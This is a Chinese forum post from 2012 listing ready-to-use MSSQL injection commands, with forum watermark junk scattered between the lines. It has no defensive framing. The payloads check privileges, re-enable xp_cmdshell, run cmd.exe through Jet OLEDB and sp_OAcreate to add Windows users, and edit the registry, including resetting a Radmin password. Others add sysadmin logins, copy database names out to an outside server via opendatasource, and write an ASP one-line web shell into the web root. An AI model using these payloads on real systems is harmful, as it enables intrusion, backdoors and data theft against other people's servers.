找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2143|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的2 I, n! m7 K3 k, h
and 1=(Select IS_MEMBER('db_owner'))+ A" w7 B2 @3 E* N4 v+ O! R% ?* D
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
6 I0 i  R9 l: c! g5 u2 [* y& |2 l1 d
//检测是否有读取某数据库的权限
8 B. {/ C$ c! _3 ]# Land 1= (Select HAS_DBACCESS('master'))
' K2 W" D8 G' d3 Z- D5 P; p9 [0 UAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --' ]9 j% e/ F, F6 z3 g
" l, L4 Z7 }) Y2 L9 N2 w

1 |* Q4 n3 i0 C2 h% L数字类型3 j5 U8 u, X' i; z
and char(124)%2Buser%2Bchar(124)=0
% N3 l9 C6 ]! p- I
7 i& c+ j1 z  j# ~9 X: P' `! Y字符类型
0 ^3 r$ V: d: ~7 r, H! {8 }' and char(124)%2Buser%2Bchar(124)=0 and ''='
- I4 v3 h5 S4 Y* g9 s1 S! z# F( k/ }5 o6 F5 y
搜索类型
: U( d4 n5 h2 r* q' E' and char(124)%2Buser%2Bchar(124)=0 and '%'='
7 z# ?: p4 b( y8 x! M
+ g5 c: v4 _/ @4 C! T' {/ ~爆用户名8 E1 Q$ I% e$ X. `* M
and user>0# O. f8 K2 q8 z$ h. L; _
' and user>0 and ''='5 @# z6 ~, H1 }8 H

# }  ]* ]. g! M2 @3 _8 s5 u检测是否为SA权限/ n/ ?2 S, o4 k5 M$ g
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
: u6 C) l' W3 ?! R! ^4 {, P4 [% [& jAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --7 P0 M# B3 z1 {7 {% n: c/ u

- I. P$ ]/ {! o检测是不是MSSQL数据库
- B. `( C8 t) ~* land exists (select * from sysobjects);--  x* @5 h5 |4 e; _% _1 l

: T: J6 {8 ]1 n; V6 p检测是否支持多行
9 |3 }  f& @5 j;declare @d int;--, q- i% ?. Q; H. E

; _" C7 G; ^' \2 p3 L% N恢复 xp_cmdshell- l5 c' y5 Q" F$ h. s
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
3 x4 A, n/ p/ A& \+ U- S# a
6 q, ~+ q0 j& _9 ?( o& P, L6 T: W7 O9 l: V2 y- B* x* E' F$ C
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')$ O9 a2 X/ ~$ ~

+ w1 d' C5 \: h- \4 e//-----------------------
) l) L8 ]7 c/ D2 V4 G9 }' w//       执行命令+ H7 O" K- S; C; n. z: D
//-----------------------$ ?2 ~1 U# ^! }
首先开启沙盘模式:
$ U+ F. ?/ X* V9 }3 oexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1, y5 s: P% f  z' ~/ a

( f& u$ B. d; I$ w; B* f/ Q然后利用jet.oledb执行系统命令9 b. C4 |4 `) l; n$ ^
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')' L, H" z2 {' m/ {; C' u7 ^

. {5 {  l  \1 e& z$ M* K执行命令
: E6 q" G+ t1 `;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--# o3 O. r5 J' z3 K8 q6 B- k

/ Q  o' K* X. S6 N4 w. V- |% s0 I2 xEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
, b; y2 B; j- C5 z
, @- G) Y+ `8 C4 |$ r判断xp_cmdshell扩展存储过程是否存在:
# o/ U7 j7 C0 ~# c9 x$ }! Ahttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')( d- j; Q  M- N4 A' h" }
8 D; k: D7 H, u4 Z+ @
写注册表" U: @% v( f6 z  q7 g$ F0 m
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
/ Y' L( g  ?2 J& y" F  c/ P4 x
7 |7 h" e% V0 U% L# _5 V0 QREG_SZ; l2 M0 V% h2 ^7 \
" y/ f" P. u4 ?+ U
读注册表5 f- }$ U" w& i
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'5 t1 r* n/ a. v1 [2 `: d

5 S# m* _8 t% D1 @- G8 K读取目录内容; N8 r5 Q5 ~! R
exec master..xp_dirtree 'c:\winnt\system32\',1,1
6 M2 S5 x& Z8 v/ }+ Z" b% c0 E4 {/ {; t% `( Y. g; X# L

0 M" `2 a+ W7 ?& V/ k( Q( `数据库备份
/ W( b7 p9 _8 o! g1 nbackup database pubs to disk = 'c:\123.bak': ^+ s+ F4 I: k7 ?6 W0 a: d, V3 G
3 ~6 D- K- L9 J, u% [8 a
//爆出长度, d0 F! P" ~# j! }9 P: f! |9 @- h4 O
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
8 V2 b6 l3 w& ~  D, R0 t/ T+ {- V. W' F
0 m3 D, o0 Y& C' V4 Y" o
, W' \8 n* d; x2 {1 ^
更改sa口令方法:用sql综合利用工具连接后,执行命令:
" i2 E7 |7 l2 u! N8 Mexec sp_password NULL,'新密码','sa'
6 x. h, W1 @  F  @% s5 p! s8 r) G% h* }9 c  D+ |" G& M
添加和删除一个SA权限的用户test:7 s: J: y6 ?" s# s2 v. I4 }) n
exec master.dbo.sp_addlogin test,9530772( K3 L- Z3 p3 h- M
exec master.dbo.sp_addsrvrolemember test,sysadmin
3 Q7 {8 s: I6 o3 ?. W9 y
- A  n# Y1 O7 y; ^3 a5 D删除扩展存储过过程xp_cmdshell的语句:( u5 q. S5 \0 F' X* b
exec sp_dropextendedproc 'xp_cmdshell'0 c0 |5 y4 Y/ H: H" m0 ~6 M. j+ y/ w

' c! V' M; |7 ~9 ^. A) P% v% O5 ]添加扩展存储过过程7 z( r  i8 S8 u! Q# I: R
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
" q; C- ?; f  N# u1 A# sGRANT exec On xp_proxiedadata TO public
0 H3 k+ B( Q6 Q! G& ^
5 a% s( [' i8 W3 {9 {1 ]8 ]! G, ?9 V( w& Z% S  k1 g
停掉或激活某个服务。% ?& H" p/ P3 h4 w! T) _1 f" B# q

- p2 }: l  l. \) Z( U* {% f: I0 Aexec master..xp_servicecontrol 'stop','schedule'6 G) {* z# J0 _: C3 w# K9 e
exec master..xp_servicecontrol 'start','schedule'
! O4 U: l7 D/ g: b
( h' S- P5 X$ v: ^dbo.xp_subdirs
+ l6 J- j) T* h
0 [4 ^+ [. Z3 g- c4 j2 G3 U+ P6 v只列某个目录下的子目录。3 ^# K& u/ T# H6 I, y/ C
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
* |+ z" v' [  ]3 ^1 v! A
0 h- {* f" x1 u* S( C3 gdbo.xp_makecab  o$ g/ _3 r% |% m' t
2 ^: I& Q' r2 f. S  i0 \
将目标多个档案压缩到某个目标档案之内。
- {  r) ?( v. _所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
, Y" ?. P% B7 k1 U7 H& t, G
. ]1 B- |8 r; a8 ?4 @3 Ldbo.xp_makecab! R3 O! _( n* O1 y& W; c
'c:\test.cab','mszip',1,5 H% E2 T  Y" B, g! B+ H/ ~1 ^
'C:\Inetpub\wwwroot\SQLInject\login.asp',
* c  I2 {6 O& ~8 P! w8 m6 C$ {'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
0 p' D0 j, S% q/ B1 T' E
9 Y8 a) h9 N* P6 B% ?xp_terminate_process. u+ A. w0 w& g7 c. q! L

  a# F8 u" Q) }+ B3 k" x停掉某个执行中的程序,但赋予的参数是 Process ID。
+ d8 I9 q. I9 r4 _利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID7 o, ~& {) F9 z1 }( c3 c+ S1 c+ k

" r/ W" a5 y+ y3 G# G% K8 Y% R# xxp_terminate_process 2484, x" c7 q( Z) [$ A! |
* a2 C# s' i6 ?8 k: J
xp_unpackcab
$ s- T% m& q0 z# k) ?: P" u& S) Z" F7 {* w5 @
解开压缩档。% b! N3 c& ]5 F
7 b% {5 F& V8 y6 C* ~
xp_unpackcab 'c:\test.cab','c:\temp',1
4 T, }# l: k5 I7 |1 A, y5 m, v4 S5 Q% n- {  j' f  f! u
1 ~# h* D3 ~1 T+ l8 ]0 u) ?
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
% ~" Y, c+ k: G: E" _: b
/ r3 ?/ @* k) {# Jcreate database lcx;
7 N) M" H% O/ ~2 w  @& ~5 UCreate TABLE ku(name nvarchar(256) null);
! N% C' b# E% S7 q- s4 W6 yCreate TABLE biao(id int NULL,name nvarchar(256) null);; v# [2 l. ?& B2 i" M4 R

3 L. {3 d# Z6 C0 F3 ?//得到数据库名
* H2 y) Q# I- x6 V2 J8 r; |% ^+ S7 kinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
  a! ], P6 B: \! [! S% W1 @* i

3 a" y$ g2 n# b//在Master中创建表,看看权限怎样
( Y' r* s8 D6 ?7 t- q& X, XCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
. C) v; [2 O$ E5 k5 R3 }3 R4 q& O6 T
用 sp_makewebtask直接在web目录里写入一句话马:( i6 y. Z1 _$ y+ @% R
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
" a+ d! ^) J9 T4 H
: K  X+ H$ ?$ s//更新表内容0 N9 _5 h% Y" h2 |8 |$ a- n
Update films SET kind = 'Dramatic' Where id = 123$ T: e, X1 G! K1 P
$ x* q1 ^7 E; V8 I1 k' {* N
//删除内容
! z. |; |5 I: N, k9 L) rdelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表